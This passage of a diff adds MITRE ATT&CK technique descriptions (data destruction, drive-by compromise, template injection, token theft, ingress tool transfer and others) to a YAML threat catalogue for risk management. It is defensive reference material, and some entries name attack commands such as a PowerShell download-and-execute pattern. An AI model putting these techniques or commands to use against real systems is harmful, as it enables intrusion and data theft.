+      \ Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation:\
+      \ Krebs Access Brokers Fortune 500) In some cases, adversary groups may form\
+      \ partnerships to share compromised systems with each other.(Citation: CISA\
+      \ Karakurt 2022)\n\nFootholds to compromised systems may take a variety of forms,\
+      \ such as access to planted backdoors (e.g., [Web Shell](https://attack.mitre.org/techniques/T1505/003))\
+      \ or established access via [External Remote Services](https://attack.mitre.org/techniques/T1133).\
+      \ In some cases, access brokers will implant compromised systems with a \u201C\
+      load\u201D that can be used to install additional malware for paying customers.(Citation:\
+      \ Microsoft Ransomware as a Service)\n\nBy leveraging existing access broker\
+      \ networks rather than developing or obtaining their own initial access capabilities,\
+      \ an adversary can potentially reduce the resources required to gain a foothold\
+      \ on a target network and focus their efforts on later stages of compromise.\
+      \ Adversaries may prioritize acquiring access to systems that have been determined\
+      \ to lack security monitoring or that have high privileges, or systems that\
+      \ belong to organizations in a particular sector.(Citation: Microsoft Ransomware\
+      \ as a Service)(Citation: CrowdStrike Access Brokers)\n\nIn some cases, purchasing\
+      \ access to an organization in sectors such as IT contracting, software development,\
+      \ or telecommunications may allow an adversary to compromise additional victims\
+      \ via a [Trusted Relationship](https://attack.mitre.org/techniques/T1199), [Multi-Factor\
+      \ Authentication Interception](https://attack.mitre.org/techniques/T1111), or\
+      \ even [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195).\n\
+      \n**Note:** while this technique is distinct from other behaviors such as [Purchase\
+      \ Technical Data](https://attack.mitre.org/techniques/T1597/002) and [Credentials](https://attack.mitre.org/techniques/T1589/001),\
+      \ they may often be used in conjunction (especially where the acquired foothold\
+      \ requires [Valid Accounts](https://attack.mitre.org/techniques/T1078)).\nhttps://attack.mitre.org/techniques/T1650"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1213
+    name: T1213 - Data from Information Repositories
+    provider: MITRE ATT&CK
+    description: "Adversaries may leverage information repositories to mine valuable\
+      \ information. Information repositories are tools that allow for storage of\
+      \ information, typically to facilitate collaboration or information sharing\
+      \ between users, and can store a wide variety of data that may aid adversaries\
+      \ in further objectives, or direct access to the target information. Adversaries\
+      \ may also abuse external sharing features to share sensitive documents with\
+      \ recipients outside of the organization. \n\nThe following is a brief list\
+      \ of example information that may hold potential value to an adversary and may\
+      \ also be found on an information repository:\n\n* Policies, procedures, and\
+      \ standards\n* Physical / logical network diagrams\n* System architecture diagrams\n\
+      * Technical system documentation\n* Testing / development credentials\n* Work\
+      \ / project schedules\n* Source code snippets\n* Links to network shares and\
+      \ other internal resources\n\nInformation stored in a repository may vary based\
+      \ on the specific instance or environment. Specific common information repositories\
+      \ include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)\
+      \ and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific\
+      \ services such as Code Repositories, IaaS databases, enterprise databases,\
+      \ and other storage infrastructure such as SQL Server.\nhttps://attack.mitre.org/techniques/T1213"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1200
+    name: T1200 - Hardware Additions
+    provider: MITRE ATT&CK
+    description: 'Adversaries may introduce computer accessories, networking hardware,
+      or other computing devices into a system or network that can be used as a vector
+      to gain access. Rather than just connecting and distributing payloads via removable
+      storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)),
+      more robust hardware additions can be used to introduce new functionalities
+      and/or features into a system that can then be abused.
+
+
+      While public references of usage by threat actors are scarce, many red teams/penetration
+      testers leverage hardware additions for initial access. Commercial and open
+      source products can be leveraged with capabilities such as passive network tapping,
+      network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)),
+      keystroke injection, kernel memory reading via DMA, addition of new wireless
+      access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation:
+      Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan
+      Pwn March 2012)
+
+      https://attack.mitre.org/techniques/T1200'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1505
+    name: T1505 - Server Software Component
+    provider: MITRE ATT&CK
+    description: 'Adversaries may abuse legitimate extensible development features
+      of servers to establish persistent access to systems. Enterprise server applications
+      may include features that allow developers to write and install software or
+      scripts to extend the functionality of the main application. Adversaries may
+      install malicious components to extend and abuse server applications.(Citation:
+      volexity_0day_sophos_FW)
+
+      https://attack.mitre.org/techniques/T1505'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1485
+    name: T1485 - Data Destruction
+    provider: MITRE ATT&CK
+    description: 'Adversaries may destroy data and files on specific systems or in
+      large numbers on a network to interrupt availability to systems, services, and
+      network resources. Data destruction is likely to render stored data irrecoverable
+      by forensic techniques through overwriting files or data on local and remote
+      drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation:
+      Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit
+      42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system
+      file deletion commands such as <code>del</code> and <code>rm</code> often only
+      remove pointers to files without wiping the contents of the files themselves,
+      making the files recoverable by proper forensic methodology. This behavior is
+      distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001)
+      and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because
+      individual files are destroyed rather than sections of a storage disk or the
+      disk''s logical structure.
+
+
+      Adversaries may attempt to overwrite files and directories with randomly generated
+      data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation:
+      Unit 42 Shamoon3 2018) In some cases politically oriented image files have been
+      used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto
+      Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
+
+
+      To maximize impact on the target organization in operations where network-wide
+      availability interruption is the goal, malware designed for destroying data
+      may have worm-like features to propagate across a network by leveraging additional
+      techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078),
+      [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows
+      Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec
+      Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon
+      Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer
+      2018).
+
+
+      In cloud environments, adversaries may leverage access to delete cloud storage,
+      cloud storage accounts, machine images, and other infrastructure crucial to
+      operations to damage an organization or their customers.(Citation: Data Destruction
+      - Threat Post)(Citation: DOJ  - Cisco Insider)
+
+      https://attack.mitre.org/techniques/T1485'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1537
+    name: T1537 - Transfer Data to Cloud Account
+    provider: MITRE ATT&CK
+    description: 'Adversaries may exfiltrate data by transferring the data, including
+      backups of cloud environments, to another cloud account they control on the
+      same service to avoid typical file transfers/downloads and network-based exfiltration
+      detection.
+
+
+      A defender who is monitoring for large transfers to outside the cloud environment
+      through normal file transfers or over command and control channels may not be
+      watching for data transfers to another account within the same cloud provider.
+      Such transfers may utilize existing cloud provider APIs and the internal address
+      space of the cloud provider to blend into normal traffic or avoid data transfers
+      over external network interfaces.
+
+
+      Incidents have been observed where adversaries have created backups of cloud
+      instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment
+      Jul 2018)
+
+      https://attack.mitre.org/techniques/T1537'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1189
+    name: T1189 - Drive-by Compromise
+    provider: MITRE ATT&CK
+    description: "Adversaries may gain access to a system through a user visiting\
+      \ a website over the normal course of browsing. With this technique, the user's\
+      \ web browser is typically targeted for exploitation, but adversaries may also\
+      \ use compromised websites for non-exploitation behavior such as acquiring [Application\
+      \ Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple\
+      \ ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)),\
+      \ including:\n\n* A legitimate website is compromised where adversaries have\
+      \ injected some form of malicious code such as JavaScript, iFrames, and cross-site\
+      \ scripting\n* Script files served to a legitimate website from a publicly writeable\
+      \ cloud storage bucket are modified by an adversary\n* Malicious ads are paid\
+      \ for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))\n\
+      * Built-in web application interfaces are leveraged for the insertion of any\
+      \ other kind of object that can be used to display web content or contain a\
+      \ script that executes on the visiting client (e.g. forum posts, comments, and\
+      \ other user controllable web content).\n\nOften the website used by an adversary\
+      \ is one visited by a specific community, such as government, a particular industry,\
+      \ or region, where the goal is to compromise a specific user or set of users\
+      \ based on a shared interest. This kind of targeted campaign is often referred\
+      \ to a strategic web compromise or watering hole attack. There are several known\
+      \ examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\n\
+      \nTypical drive-by compromise process:\n\n1. A user visits a website that is\
+      \ used to host the adversary controlled content.\n2. Scripts automatically execute,\
+      \ typically searching versions of the browser and plugins for a potentially\
+      \ vulnerable version. \n    * The user may be required to assist in this process\
+      \ by enabling scripting or active website components and ignoring warning dialog\
+      \ boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to\
+      \ the browser.\n4. If exploitation is successful, then it will give the adversary\
+      \ code execution on the user's system unless other protections are in place.\n\
+      \    * In some cases a second visit to the website after the initial scan is\
+      \ required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing\
+      \ Application](https://attack.mitre.org/techniques/T1190), the focus of this\
+      \ technique is to exploit software on a client endpoint upon visiting a website.\
+      \ This will commonly give an adversary access to systems on the internal network\
+      \ instead of external systems that may be in a DMZ.\n\nAdversaries may also\
+      \ use compromised websites to deliver a user to a malicious application designed\
+      \ to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s,\
+      \ like OAuth tokens, to gain access to protected applications and information.\
+      \ These malicious applications have been delivered through popups on legitimate\
+      \ websites.(Citation: Volexity OceanLotus Nov 2017)\nhttps://attack.mitre.org/techniques/T1189"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1498
+    name: T1498 - Network Denial of Service
+    provider: MITRE ATT&CK
+    description: 'Adversaries may perform Network Denial of Service (DoS) attacks
+      to degrade or block the availability of targeted resources to users. Network
+      DoS can be performed by exhausting the network bandwidth services rely on. Example
+      resources include specific websites, email services, DNS, and web-based applications.
+      Adversaries have been observed conducting network DoS attacks for political
+      purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support
+      other malicious activities, including distraction(Citation: FSISAC FraudNetDoS
+      September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October
+      2014)
+
+
+      A Network DoS will occur when the bandwidth capacity of the network connection
+      to a system is exhausted due to the volume of malicious traffic directed at
+      the resource or the network connections and network devices the resource relies
+      on. For example, an adversary may send 10Gbps of traffic to a server that is
+      hosted by a network with a 1Gbps connection to the internet. This traffic can
+      be generated by a single system or multiple systems spread across the internet,
+      which is commonly referred to as a distributed DoS (DDoS).
+
+
+      To perform Network DoS attacks several aspects apply to multiple methods, including
+      IP address spoofing, and botnets.
+
+
+      Adversaries may use the original IP address of an attacking system, or spoof
+      the source IP address to make the attack traffic more difficult to trace back
+      to the attacking system or to enable reflection. This can increase the difficulty
+      defenders have in defending against the attack by reducing or eliminating the
+      effectiveness of filtering by the source address on network defense devices.
+
+
+      For DoS attacks targeting the hosting system directly, see [Endpoint Denial
+      of Service](https://attack.mitre.org/techniques/T1499).
+
+      https://attack.mitre.org/techniques/T1498'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1651
+    name: T1651 - Cloud Administration Command
+    provider: MITRE ATT&CK
+    description: "Adversaries may abuse cloud management services to execute commands\
+      \ within virtual machines or hybrid-joined devices. Resources such as AWS Systems\
+      \ Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts\
+      \ in virtual machines by leveraging installed virtual machine agents. Similarly,\
+      \ in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune\
+      \ Administrators to run scripts as SYSTEM on on-premises devices joined to the\
+      \ Azure AD.(Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run\
+      \ Command)(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020)\n\
+      \nIf an adversary gains administrative access to a cloud environment, they may\
+      \ be able to abuse cloud management services to execute commands in the environment\u2019\
+      s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary\
+      \ that compromises a service provider or delegated administrator account may\
+      \ similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199)\
+      \ to execute commands in connected virtual machines.(Citation: MSTIC Nobelium\
+      \ Oct 2021)\nhttps://attack.mitre.org/techniques/T1651"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1221
+    name: T1221 - Template Injection
+    provider: MITRE ATT&CK
+    description: "Adversaries may create or modify references in user document templates\
+      \ to conceal malicious code or force authentication attempts. For example, Microsoft\u2019\
+      s Office Open XML (OOXML) specification defines an XML-based format for Office\
+      \ documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls,\
+      \ .ppt). OOXML files are packed together ZIP archives compromised of various\
+      \ XML files, referred to as parts, containing properties that collectively define\
+      \ how a document is rendered.(Citation: Microsoft Open XML July 2017)\n\nProperties\
+      \ within parts may reference shared public resources accessed via online URLs.\
+      \ For example, template properties may reference a file, serving as a pre-formatted\
+      \ document blueprint, that is fetched when the document is loaded.\n\nAdversaries\
+      \ may abuse these templates to initially conceal malicious code to be executed\
+      \ via user documents. Template references injected into a document may enable\
+      \ malicious payloads to be fetched and executed when the document is loaded.(Citation:\
+      \ SANS Brian Wiltse Template Injection) These documents can be delivered via\
+      \ other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566)\
+      \ and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and\
+      \ may evade static detections since no typical indicators (VBA macro, script,\
+      \ etc.) are present until after the malicious payload is fetched.(Citation:\
+      \ Redxorblue Remote Template Injection) Examples have been seen in the wild\
+      \ where template injection was used to load malicious code containing an exploit.(Citation:\
+      \ MalwareBytes Template Injection OCT 2017)\n\nAdversaries may also modify the\
+      \ <code>*\\template</code> control word within an .rtf file to similarly conceal\
+      \ then download malicious code. This legitimate control word value is intended\
+      \ to be a file destination of a template file resource that is retrieved and\
+      \ loaded when an .rtf file is opened. However, adversaries may alter the bytes\
+      \ of an existing .rtf file to insert a template control word field to include\
+      \ a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation:\
+      \ Ciberseguridad Decoding malicious RTF files)\n\nThis technique may also enable\
+      \ [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting\
+      \ a SMB/HTTPS (or other credential prompting) URL and triggering an authentication\
+      \ attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template\
+      \ Injection July 2017)(Citation: ryhanson phishery SEPT 2016)\nhttps://attack.mitre.org/techniques/T1221"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1134
+    name: T1134 - Access Token Manipulation
+    provider: MITRE ATT&CK
+    description: 'Adversaries may modify access tokens to operate under a different
+      user or system security context to perform actions and bypass access controls.
+      Windows uses access tokens to determine the ownership of a running process.
+      A user can manipulate access tokens to make a running process appear as though
+      it is the child of a different process or belongs to someone other than the
+      user that started the process. When this occurs, the process also takes on the
+      security context associated with the new token.
+
+
+      An adversary can use built-in Windows API functions to copy access tokens from
+      existing processes; this is known as token stealing. These token can then be
+      applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001))
+      or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)).
+      An adversary must already be in a privileged user context (i.e. administrator)
+      to steal a token. However, adversaries commonly use token stealing to elevate
+      their security context from the administrator level to the SYSTEM level. An
+      adversary can then use a token to authenticate to a remote system as the account
+      for that token if the account has appropriate permissions on the remote system.(Citation:
+      Pentestlab Token Manipulation)
+
+
+      Any standard user can use the <code>runas</code> command, and the Windows API
+      functions, to create impersonation tokens; it does not require access to an
+      administrator account. There are also other mechanisms, such as Active Directory
+      fields, that can be used to modify access tokens.
+
+      https://attack.mitre.org/techniques/T1134'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1111
+    name: T1111 - Multi-Factor Authentication Interception
+    provider: MITRE ATT&CK
+    description: "Adversaries may target multi-factor authentication (MFA) mechanisms,\
+      \ (i.e., smart cards, token generators, etc.) to gain access to credentials\
+      \ that can be used to access systems, services, and network resources. Use of\
+      \ MFA is recommended and provides a higher level of security than usernames\
+      \ and passwords alone, but organizations should be aware of techniques that\
+      \ could be used to intercept and bypass these security mechanisms. \n\nIf a\
+      \ smart card is used for multi-factor authentication, then a keylogger will\
+      \ need to be used to obtain the password associated with a smart card during\
+      \ normal use. With both an inserted card and access to the smart card password,\
+      \ an adversary can connect to a network resource using the infected system to\
+      \ proxy the authentication with the inserted hardware token. (Citation: Mandiant\
+      \ M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target\
+      \ other hardware tokens, such as RSA SecurID. Capturing token input (including\
+      \ a user's personal identification code) may provide temporary access (i.e.\
+      \ replay the one-time passcode until the next value rollover) as well as possibly\
+      \ enabling adversaries to reliably predict future authentication values (given\
+      \ access to both the algorithm and any seed values used to generate appended\
+      \ temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of MFA may\
+      \ be intercepted and used by an adversary to authenticate. It is common for\
+      \ one-time codes to be sent via out-of-band communications (email, SMS). If\
+      \ the device and/or service is not secured, then it may be vulnerable to interception.\
+      \ Service providers can also be targeted: for example, an adversary may compromise\
+      \ an SMS messaging service in order to steal MFA codes sent to users\u2019 phones.(Citation:\
+      \ Okta Scatter Swine 2022)\nhttps://attack.mitre.org/techniques/T1111"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1136
+    name: T1136 - Create Account
+    provider: MITRE ATT&CK
+    description: 'Adversaries may create an account to maintain access to victim systems.
+      With a sufficient level of access, creating such accounts may be used to establish
+      secondary credentialed access that do not require persistent remote access tools
+      to be deployed on the system.
+
+
+      Accounts may be created on the local system or within a domain or cloud tenant.
+      In cloud environments, adversaries may create accounts that only have access
+      to specific services, which can reduce the chance of detection.
+
+      https://attack.mitre.org/techniques/T1136'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1526
+    name: T1526 - Cloud Service Discovery
+    provider: MITRE ATT&CK
+    description: 'An adversary may attempt to enumerate the cloud services running
+      on a system after gaining access. These methods can differ from platform-as-a-service
+      (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS).
+      Many services exist throughout the various cloud providers and can include Continuous
+      Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc.
+      They may also include security services, such as AWS GuardDuty and Microsoft
+      Defender for Cloud, and logging services, such as AWS CloudTrail and Google
+      Cloud Audit Logs.
+
+
+      Adversaries may attempt to discover information about the services enabled throughout
+      the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure
+      Resource Manager API, can enumerate resources and services, including applications,
+      management groups, resources and policy definitions, and their relationships
+      that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation:
+      Azure AD Graph API)
+
+
+      For example, Stormspotter is an open source tool for enumerating and constructing
+      a graph for Azure resources and services, and Pacu is an open source AWS exploitation
+      framework that supports several methods for discovering cloud services.(Citation:
+      Azure - Stormspotter)(Citation: GitHub Pacu)
+
+
+      Adversaries may use the information gained to shape follow-on behaviors, such
+      as targeting data or credentials from enumerated services or evading identified
+      defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)
+      or [Disable or Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008).
+
+      https://attack.mitre.org/techniques/T1526'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1018
+    name: T1018 - Remote System Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to get a listing of other systems by IP
+      address, hostname, or other logical identifier on a network that may be used
+      for Lateral Movement from the current system. Functionality could exist within
+      remote access tools to enable this, but utilities available on the operating
+      system could also be used such as  [Ping](https://attack.mitre.org/software/S0097)
+      or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039).
+
+
+      Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code>
+      or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099)
+      cache entries) in order to discover the presence of remote systems in an environment.
+
+
+      Adversaries may also target discovery of network infrastructure as well as leverage
+      [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands
+      on network devices to gather detailed information about systems within a network
+      (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation:
+      CISA AR21-126A FIVEHANDS May 2021)
+
+      https://attack.mitre.org/techniques/T1018'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1046
+    name: T1046 - Network Service Discovery
+    provider: MITRE ATT&CK
+    description: "Adversaries may attempt to get a listing of services running on\
+      \ remote hosts and local network infrastructure devices, including those that\
+      \ may be vulnerable to remote software exploitation. Common methods to acquire\
+      \ this information include port and/or vulnerability scans using tools that\
+      \ are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)  \
+      \ \n\nWithin cloud environments, adversaries may attempt to discover services\
+      \ running on other cloud hosts. Additionally, if the cloud environment is connected\
+      \ to a on-premises environment, adversaries may be able to identify services\
+      \ running on non-cloud systems as well.\n\nWithin macOS environments, adversaries\
+      \ may use the native Bonjour application to discover services running on other\
+      \ macOS hosts within a network. The Bonjour mDNSResponder daemon automatically\
+      \ registers and advertises a host\u2019s registered services on the network.\
+      \ For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp\
+      \ .</code>) to find other systems broadcasting the ssh service.(Citation: apple\
+      \ doco bonjour description)(Citation: macOS APT Activity Bradley)\nhttps://attack.mitre.org/techniques/T1046"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1518
+    name: T1518 - Software Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to get a listing of software and software
+      versions that are installed on a system or in a cloud environment. Adversaries
+      may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518)
+      during automated discovery to shape follow-on behaviors, including whether or
+      not the adversary fully infects the target and/or attempts specific actions.
+
+
+      Adversaries may attempt to enumerate software for a variety of reasons, such
+      as figuring out what security measures are present or if the compromised system
+      has a version of software that is vulnerable to [Exploitation for Privilege
+      Escalation](https://attack.mitre.org/techniques/T1068).
+
+      https://attack.mitre.org/techniques/T1518'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1538
+    name: T1538 - Cloud Service Dashboard
+    provider: MITRE ATT&CK
+    description: 'An adversary may use a cloud service dashboard GUI with stolen credentials
+      to gain useful information from an operational cloud environment, such as specific
+      services, resources, and features. For example, the GCP Command Center can be
+      used to view all assets, findings of potential security risks, and to run additional
+      queries, such as finding public IP addresses and open ports.(Citation: Google
+      Command Center Dashboard)
+
+
+      Depending on the configuration of the environment, an adversary may be able
+      to enumerate more information via the graphical dashboard than an API. This
+      allows the adversary to gain information without making any API requests.
+
+      https://attack.mitre.org/techniques/T1538'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1622
+    name: T1622 - Debugger Evasion
+    provider: MITRE ATT&CK
+    description: "Adversaries may employ various means to detect and avoid debuggers.\
+      \ Debuggers are typically used by defenders to trace and/or analyze the execution\
+      \ of potential malware payloads.(Citation: ProcessHacker Github)\n\nDebugger\
+      \ evasion may include changing behaviors based on the results of the checks\
+      \ for the presence of artifacts indicative of a debugged environment. Similar\
+      \ to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497),\
+      \ if the adversary detects a debugger, they may alter their malware to disengage\
+      \ from the victim or conceal the core functions of the implant. They may also\
+      \ search for debugger artifacts before dropping secondary or additional payloads.\n\
+      \nSpecific checks will vary based on the target and/or adversary, but may involve\
+      \ [Native API](https://attack.mitre.org/techniques/T1106) function calls such\
+      \ as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>,\
+      \ or manually checking the <code>BeingDebugged</code> flag of the Process Environment\
+      \ Block (PEB). Other checks for debugging artifacts may also seek to enumerate\
+      \ hardware breakpoints, interrupt assembly opcodes, time checks, or measurements\
+      \ if exceptions are raised in the current process (assuming a present debugger\
+      \ would \u201Cswallow\u201D or handle the potential error).(Citation: hasherezade\
+      \ debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)\n\nAdversaries\
+      \ may use the information learned from these debugger checks during automated\
+      \ discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching\
+      \ the process or flooding debug logs with meaningless data via messages produced\
+      \ by looping [Native API](https://attack.mitre.org/techniques/T1106) function\
+      \ calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest\
+      \ partii)(Citation: Checkpoint Dridex Jan 2021)\nhttps://attack.mitre.org/techniques/T1622"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1052
+    name: T1052 - Exfiltration Over Physical Medium
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to exfiltrate data via a physical medium,
+      such as a removable drive. In certain circumstances, such as an air-gapped network
+      compromise, exfiltration could occur via a physical medium or device introduced
+      by a user. Such media could be an external hard drive, USB drive, cellular phone,
+      MP3 player, or other removable storage and processing device. The physical medium
+      or device could be used as the final exfiltration point or to hop between otherwise
+      disconnected systems.
+
+      https://attack.mitre.org/techniques/T1052'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1105
+    name: T1105 - Ingress Tool Transfer
+    provider: MITRE ATT&CK
+    description: "Adversaries may transfer tools or other files from an external system\
+      \ into a compromised environment. Tools or files may be copied from an external\
+      \ adversary-controlled system to the victim network through the command and\
+      \ control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095).\
+      \ Once present, adversaries may also transfer/spread tools between victim devices\
+      \ within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).\
+      \ \n\nOn Windows, adversaries may use various utilities to download tools, such\
+      \ as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160),\
+      \ and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such\
+      \ as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>.\
+      \ On Linux and macOS systems, a variety of utilities also exist, such as `curl`,\
+      \ `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)\n\
+      \nAdversaries may also abuse installers and package managers, such as `yum`\
+      \ or `winget`, to download tools to victim hosts.\n\nFiles can also be transferred\
+      \ using various [Web Service](https://attack.mitre.org/techniques/T1102)s as\
+      \ well as native or otherwise present tools on the victim system.(Citation:\
+      \ PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage\
+      \ services that sync between a web-based and an on-premises client, such as\
+      \ Dropbox or OneDrive, to transfer files onto victim systems. For example, by\
+      \ compromising a cloud account and logging into the service's web portal, an\
+      \ adversary may be able to trigger an automatic syncing process that transfers\
+      \ the file onto the victim's machine.(Citation: Dropbox Malware Sync)\nhttps://attack.mitre.org/techniques/T1105"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1648
+    name: T1648 - Serverless Execution
+    provider: MITRE ATT&CK
+    description: "Adversaries may abuse serverless computing, integration, and automation\
+      \ services to execute arbitrary code in cloud environments. Many cloud providers\
+      \ offer a variety of serverless resources, including compute engines, application\
+      \ integration services, and web servers. \n\nAdversaries may abuse these resources\
+      \ in various ways as a means of executing arbitrary commands. For example, adversaries\
+      \ may use serverless functions to execute malicious code, such as crypto-mining\
+      \ malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation:\
+      \ Cado Security Denonia) Adversaries may also create functions that enable further\
+      \ compromise of the cloud environment. For example, an adversary may use the\
+      \ `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission\
+      \ in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003)\
+      \ to a serverless cloud function, which may then be able to perform actions\
+      \ the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation:\
+      \ Rhingo Security Labs GCP Privilege Escalation)\n\nServerless functions can\
+      \ also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)),\
+      \ potentially enabling persistent execution over time. For example, in AWS environments,\
+      \ an adversary may create a Lambda function that automatically adds [Additional\
+      \ Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user\
+      \ and a corresponding CloudWatch events rule that invokes that function whenever\
+      \ a new user is created.(Citation: Backdooring an AWS account) Similarly, an\
+      \ adversary may create a Power Automate workflow in Office 365 environments\
+      \ that forwards all emails a user receives or creates anonymous sharing links\
+      \ whenever a user is granted access to a document in SharePoint.(Citation: Varonis\
+      \ Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)\n\
+      https://attack.mitre.org/techniques/T1648"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1653
+    name: T1653 - Power Settings
+    provider: MITRE ATT&CK
+    description: 'Adversaries may impair a system''s ability to hibernate, reboot,
+      or shut down in order to extend access to infected machines. When a computer
+      enters a dormant state, some or all software and hardware may cease to operate
+      which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
+
+
+      Adversaries may abuse system utilities and configuration settings to maintain
+      access by preventing machines from entering a state, such as standby, that can
+      terminate malicious activity.(Citation: Microsoft: Powercfg command-line options)(Citation:
+      systemdsleep Linux)
+
+
